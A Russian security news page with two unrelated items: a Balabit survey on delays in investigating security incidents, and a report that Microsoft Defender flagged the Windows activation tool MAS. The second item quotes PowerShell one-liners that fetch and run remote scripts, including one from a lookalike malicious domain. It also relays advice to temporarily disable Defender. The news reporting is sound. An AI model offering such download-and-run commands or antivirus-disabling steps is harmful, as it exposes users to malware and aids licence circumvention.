44% компаний пренебрегают своевременным расследованием инцидентов ИБ

44% компаний пренебрегают своевременным расследованием инцидентов ИБ

44% компаний пренебрегают своевременным расследованием инцидентов ИБ

Компания Balabit объявила результаты CSI Report — исследования о нарушениях при расследовании инцидентов информационной безопасности. Согласно отчету, в 75% компаний устанавливают строгие сроки изучения нарушений или доклада о них.

Тем не менее, 44% респондентов нарушили, по крайней мере, один из дедлайнов за последний год, а 7% признались, что это привело к серьезным последствиям.

«Исследование компании Balabit показало, что непонимание данных о системных событиях в собственной ИТ-инфраструктуре по-прежнему остается главной причиной, из-за которой компании не могут своевременно расследовать ИБ-инциденты, — отмечает Петер Гъёнгёши,  менеджер по продукту Blindspotter компании Balabit. —ИТ-специалисты испытывают трудности в работе с неструктурированными данными, им нужны инструменты, способные превратить их в ценную информацию в контексте проблемы».

Новые правила защиты информации изменят представление об отчетности

Исследование компании Balabit показывает, что сегодня только 30% компаний не обязаны докладывать об инцидентах ИБ и кибератаках внешним органам. И хотя для остальных 70% опрошенных это требование обязательно, только четверть респондентов отметили, что действительно соблюдают его. Результаты опроса показывают, что компании находятся сейчас под большим давлением регуляторных органов. Они пытаются подготовиться к новым правилам, которые требуют сообщать об утечках информации в течение 72 часов после инцидента. «Общее положение о защите данных» (GDRP), вступающее в силу в ЕС в мае 2018, и связанное с ним положение о «Защите частной жизни», обратятся для компаний-нарушителей штрафом до 2% от их мирового оборота. Кроме того, правила, выдвинутые Департаментом финансовых услуг Нью-Йорка (часть 500, раздел 23), также требуют от финансовых организаций докладывать о кибератаках в течение 72 часов.

«Болевые точки» расследования инцидентов

По просьбе компании Balabit участники опроса расположили аспекты расследований по степени важности и удовлетворенности. Рейтинг ниже показывает, чем респонденты удовлетворены менее всего, ответы представлены в порядке убывания:

  1. перевод данных в доступный для понимания формат;
  2. мониторинг и анализ действий пользователей;
  3. наличие единой отправной точки для исследования, включающей все необходимые данные;
  4. обзор отклонений от нормы действий конкретного пользователя;
  5. быстрый доступ к данным;
  6. возможность проводить узкоспециализированные расследования и глубоко изучать необычные инциденты;
  7. легкий доступ к важной информации.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru